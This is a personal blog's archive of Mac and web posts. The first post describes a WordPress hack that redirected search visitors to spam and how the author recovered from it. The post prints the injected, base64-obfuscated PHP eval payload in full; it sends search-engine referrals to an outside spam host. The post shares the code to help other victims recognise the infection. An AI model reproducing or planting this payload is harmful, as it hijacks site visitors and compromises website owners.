Tag Archives: Mac OS X

WordPress + Google Search Result links redirected/hijacked/hacked

A couple weeks ago it was brought to my attention that when googling myself and then clicking on the Google search links, users were redirected to various spam websites instead of the actual website they wanted to visit. Since I don’t google myself to visit my personal & freelance websites (I visit them directly by typing the URL into the address bar), I was entirely unaware of this problem.

I started troubleshooting this problem by googling the keywords to all the websites I host. For every WordPress website that I hosted, the google search links were hijacked and redirected to spam sites. For any static HTML pages that I hosted, the google search links took me to the correct website.

This told me that every single one of my WordPress websites had been hacked and infected with a script. In fact, when troubleshooting, I discovered that not only was it the root level (home page) of the site, but all the sitelinks (the sub links shown underneath the main search result) had been infected as well. To me, this meant that the “virus” was at least in the header.php file of the WP install.

Coincidentally, I had just made the decision to switch hosting providers. I have been with BlueHost since June 2009 and honestly have never had any negative experiences. Within the past year, my work had a hugely negative experience with BlueHost. Long story short, all of our websites hosted with them vanished into the aether. This included all of our WordPress installs and our web team’s wiki. Their response to our troubleticket was something along the lines of something blew up, nothing we can do, surely you understand. Fortunately, we do not understand and we do understand that rolling us to a backup is a reasonable expectation that they failed to see or execute. This experience terrifies me since I provide hosting for freelance clients. If their websites vanished one day with NO BACKUP, well… I’d be f’ed. As a consequence of this experience, I waited until my BlueHost hosting plan was close to expiration and then bought new hosting with DreamHost (recommended to me by a few coworkers).

Back to the hacked WordPress sites. I deduced that at the very least my header.php files were hacked, and they likely became that way because of a lack of security with my hosting provider as well as very slightly out of date WordPress installations. I needed to check my WP files on the server and then migrate all my domains and hosting off of BlueHost.

Saturday morning I checked my WP files. I began by checking index.php at the root level of the install and then in the wp-content subdirectories. EVERY SINGLE opening PHP tag was followed by this nastiness:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9")); ?>

Then, I checked my header.php file. EVERY SINGLE PHP tag was followed with this code. Literally every time my WP theme opens PHP to use a WP template tag, nasty infection virus code. Literally, metadata, keywords, title, everything, everything.

Obviously I’d been googling to troubleshoot this problem. All the google results were forums, blogs, discussion groups, etc talking about Norton, McAfee, Spider-something, and all other anti-virus software. Well it was obvious to me that the problem was not on my machine (I tested on my work Mac Pro, my home MacBook Pro, and my iPad) but on my server area. My wise husband said, “Hun, put ‘Mac’ on the end of your search.” Goodness sakes that was silly of me. Bam, I throw ‘Mac’ on the end of my search and all of a sudden I see the forums saying that it’s a server problem. That brilliant idea spurred another brilliant idea. I google the nasty infection code (shown above). Looky what I found:
http://www.cameronkeng.com/2012/04/04/guess-who-got-hacked-again-awesome-but-i-can-fix-it-perm/
Another poor soul whose WordPress site got hacked. He explains his solution to the problem here.

The bare bones “non-technical” solution that I thought of is to export your WP data to xml then re-import the data on a fresh WordPress installation. The probability of this solution working was confirmed by the link above. A few caveats or things to keep in mind…

  • Change hosting providers, and if you can afford it, opt for private hosting (shared hosting is the cheapest and it’s where they put you on a box with other people). If it happened to you once, it will happen to you again. Hubby suggested that it could be someone else that’s on the same box as me infecting everyone on the box. So even if I deleted my WP installs & did a fresh install, it is possible that the files would get hacked all over again within minutes.
  • Change your theme. All the installed themes are going to be infected too. Luckily I was running a child theme of 2011 and my child theme only had two php files with a small amount of customization. If you must keep the same theme, which I felt like I needed to, remove the virus code from the appropriate files, download locally, and zip up so you have a clean version of the theme you’re running.

The highly technical solution is to run a command line script on the server that finds all the files that have the virus code in them and duplicates all the files but without that code. Then it kills all the files that have the code. My command line juju is severely lacking and I’m terrified of that black box screen. This solution was mentioned in the two posts that guided me (linked above) and the actual script and nitty gritty details can be found here: http://tech.sarathdr.com/featured/wordpress-hacked-redirect-to-gigop-americanunfinished-com

I am ECSTATIC to report that downloading the XML export, downloading my child theme files, editing and then zipping my clean child theme files, changing hosting providers, doing a fresh WordPress install, uploading my XML, and reinstalling my clean child theme left me with a nearly perfect migration of my old website.

The only problem that I experienced is that some of my post images did not migrate over. What I did to work around that was download my entire

/uploads/

folder from my old site and then upload the entire

/uploads/

directory on my new server space. The image URLs within posts no longer returned 404s, woot woot! The only problem is that none of my [gallery] shortcodes work. I thought it was because the images are not linked to the post gallery, but my entire media library is empty. Frankly… I said eff it. Atleast all my data is here, my single images are here, my google search links take users to me, if I lose a few galleries… well that is a price that I am willing to pay.

A major win: VirtualBox installation + Windows 7

For nearly 3 months, my virtual machine at work was entirely conked out.

About the first week of December, I tried to upgrade my VirtualBox installation and it failed. I never could figure out what happened; I spent several days troubleshooting over the course of December and January. In the beginning of January, I was able to install a VERY old version  of VirtualBox (I think 3.1?) but then my installation of Windows 7 completely failed. I  gave up 3 weeks ago, and then found myself with a few slow hours this afternoon and decided to tackle it. Guess what? I SUCCEEDED!

This afternoon, I tried installing the latest version of VirtualBox (4.1.8) and it kept failing at the 95% mark of the installation. After some googling and forum reading, I discovered it possibly had something to do with an improper uninstall (this insight mainly came from this thread: https://www.virtualbox.org/ticket/1578 ).

From my 4.1.8 VirtualBox download, I ran the VirtualBox_Uninstall.tool. It opens up terminal, you have to type “Yes” and then it prompts you for your machine’s password. After that, it said something about kernels and can’t uninstall and rebooting (BTW, the only kernels I know about are the lovely extra crunchy popcorn kernels at the bottom of a popcorn bag). So I did a restart. When I was booted up again, I again opened the 4.1.8 VirtualBox download and ran VirtualBox_Uninstall.tool. This time, terminal ran a whole of 4 seconds and returned that it was completely uninstalled. WOOT!

I then double-clicked VirtualBox.mpkg and the installation succeeded!

Once the installation completed, I followed this screenshot tutorial for configuring the virtual machine. At 99% through the tutorial, I wasn’t able to figure out how to define where my Windows 7 ISO file, so then I followed this video tutorial for installing Windows 7. I was able to figure out where in the VirtualBox settings to define my Windows 7 ISO file in the first 2 minutes of the video.

My VirtualBox installation and Windows 7 installation WORKS LIKE A CHARM!

Looking back at the screenshot tutorial, after I watched the video tutorial, I see where I got lost. If I had looked a bit closer at the screenshot, I would’ve seen that the tutorial loads an ISO file.

Anyways, that doesn’t matter, what matters is that after my virtual machine going down the first week of December, I finally have it back!! WOO HOOO!!!!!

This makes for a Great Monday.

PS, In case you’re wondering… my work machine is a Mac OS X 10.6.8 (Snow Leopard), and I got VirtualBox 4.1.8 installed and it runs Windows 7 64-bit.

“The application Finder can’t be opened.”

Grr. This is the second time this has happened to me. I work on Snow Leopard at home and at work, but now twice at work I’ve gotten this fatal message:

“The application Finder can’t be opened.” -10810

Finder error

I can’t remember what I was doing the first time it happened, but when it happened just now, I was attempting to delete 4 or 5 directories on a shared server. The directories were NOT huge; it shouldn’t have crashed Finder. But it did. I had to force quit Finder and then when I tried to open it again, I got that crappy error message.

But I found a solution via the googler.

  1. Open Terminal. For those who are scared to open Terminal, don’t worry I’m in the same boat. I promise it will be okay.
  2. Type this in to Terminal:
    System/Library/CoreServices/Finder.app/Contents/MacOS/Finder &
  3. Hit Enter.
  4. Now the first time I hit enter, my Finder window popped open. I was happy, so I closed the Finder window & Terminal. Then I clicked on Finder in the dock, and I got that damn error again.

    So, second time through, I started over at Step #1 and repeated the process. The second time that I hit enter (Step #3), the Finder window did not open automatically. But the Finder icon in the dock had the bottom light, so I clicked on it and a Finder window popped open. Phew!

    But then I closed Terminal. When you go to close Terminal, it closes your Finder. Boo.

    Third time through, repeat all steps. Finder automatically opens when I hit enter this time. Hit up the googler again to find a fix.

  5. Type this in to Terminal: disown
  6. Hit Enter.
  7. Now close Terminal and your Finder should still stay open.

Wow… That was a huge bear. Hope Apple fixes that bug.

Many thanks to this person:
http://www.adeepbite.com/must-know-macosx-tips-and-tricks/the-application-finder-cant-be-opened/,
and this person:
http://utvv.blogspot.com/2010/01/how-to-fix-application-finder-cant-be.html

From a Cat loving Mac user

I love cats and I also am an Apple lover. The naming convention of Apple operating systems has never bothered me. In fact, I’ve only thought of it as EXTREMELY cool and a great use of branding. But others may have a difference of opinion and that was brought to my attention this morning when perusing the NYT website.

Check out this article that asks the question, “Is It Time for Apple to Retire the Cats?

My firm answer: No.

Meow.

Cool snow leopard video on NYT

Check out this sweet video that describes OS updates with an easy-to-understand visual aesthetic. It focuses on Snow Leopard and why it is so innovative in the world of OS updates. Sweet stuff.

BTW, yesterday Mark went out and bought the Snow Leopard update for our Mac Pro at home. I didn’t have time to check it out when I got off of work yesterday, but he said it’s quite sweet and everything is A LOT faster.

Snow Leopard

Apple’s latest update for the Leopard OS has come out a month early. Mark was just telling me this past weekend that we need to go to the store and buy it — you can’t just download and install. That kind of sucks, but since we have an Apple Store in our city, it’s not too big of a deal.

Super hot that the update is called “snow leopard” and you can upgrade your mountain cat for just $30…that just shouts out how sexy Apple is…

It installs in 15 minutes, turns on quicker, opens web browsers quicker, and it is 7GB smaller than Leopard. This is sick shit folks. You can even open files on the Mac “side” while you’re running Windows on your Mac…no restart!! Woo hoo!

NYT says that the take-away message is:

Either way, the big story here isn’t really Snow Leopard. It’s the radical concept of a software update that’s smaller, faster and better — instead of bigger, slower and more bloated. May the rest of the industry take the hint.

Check out NYT’s full story here.

Chrome nudging closer to Safari in browser market

Chrome, the browser by Google, is moving closer and closer to Safari’s spot as the third spot in the browser market share. I have Chrome downloaded on Vista at home and it’s okay, but it certainly isn’t any better than Firefox. I used to only use Safari on Mac OS at home, but I became a loyal Firefox user a little over a year ago and generally only use Safari to preview websites in development. Anyways, there is an article in NYT about all the different browsers and where they stand in the market. Check out Chrome Threatens Safari.